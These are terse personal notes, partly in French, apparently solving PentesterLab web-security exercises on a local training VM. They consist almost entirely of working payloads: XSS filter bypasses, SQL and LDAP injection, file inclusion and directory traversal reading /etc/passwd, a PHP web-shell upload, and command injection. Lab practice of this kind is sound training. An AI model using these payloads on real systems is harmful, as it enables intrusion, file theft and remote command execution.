https://www.pentesterlab.com/exercises/
http://192.168.1.34/xss/example3.php?name=%3Cscrip%3Cscript%3Et%3Ealert(%27toto%27)%3C/%3Cscript%3Escrip%3C/script%3Et%3E http://192.168.1.34/xss/example4.php?name=%3Cbutton%20onclick=%22alert(%27tg%27)%22%3Eclick%20me%20mofo%3C/button%3E http://192.168.1.34/xss/example5.php?name=%3Cscript%3Eeval(%22blert(%27toto%27)%22.replace(%22b%22,%22a%22))%3C/script%3E http://192.168.1.34/xss/example6.php?name=%22;alert(%27tg%27);// http://192.168.1.34/xss/example7.php?name=%27;%20alert(%27tg%27);// http://192.168.1.34/xss/example8.php/%22%3E%3Cscript%3E%20onclick=alert('toto')%3C/script%3E http://192.168.1.34/xss/example9.php#<script>alert('toto')</script>
http://192.168.1.34/ldap/example1.php http://192.168.1.34/ldap/example2.php?name=a*))%00&password=bla
http://192.168.1.34/sqli/example1.php?name=%27%20or%20%271%27=%271 http://192.168.1.34/sqli/example2.php?name=%27%09or%09%271%27=%271 http://192.168.1.34/sqli/example3.php?name=%27/**/or/**/%271%27=%271 http://192.168.1.34/sqli/example4.php?id=1%20OR%20id!=2 http://192.168.1.34/sqli/example5.php?id=2%20or%20id!=2 http://192.168.1.34/sqli/example6.php?id=2%20or%20id!=2#123 http://192.168.1.34/sqli/example7.php?id=2%0aor%20id!=2 http://192.168.1.34/sqli/example8.php?order=age`%20DESC%23 http://192.168.1.34/sqli/example9.php?order=IF(1,id,id)
http://192.168.1.34/fileincl/example1.php?page=http://www.google.fr http://192.168.1.34/fileincl/example1.php?page=../../../../../../../etc/passwd http://192.168.1.34/fileincl/example2.php?page=http://google.fr?foo=
example1 : upload toto.html contenant "<script>alert('lol');</script>" ou upload tg.php contenant "<?php system($_GET["cmd"]);?>" example2 : toto.html fonctionne toujours tg.php est filtré, renommer en tg.php3
http://192.168.1.34/commandexec/example1.php?ip=google.fr;cat%20/etc/passwd http://192.168.1.34/commandexec/example2.php?ip=mustcontain%0a127.0.0.1%0als echo "GET /commandexec/example3.php?ip=||ls;" | nc 192.168.1.34 80
http://192.168.1.34/dirtrav/example1.php?file=../../../../../../etc/passwd http://192.168.1.34/dirtrav/example2.php?file=/var/www/files/../../../../etc/passwd http://192.168.1.34/dirtrav/example3.php?file=../../../../../etc/passwd%00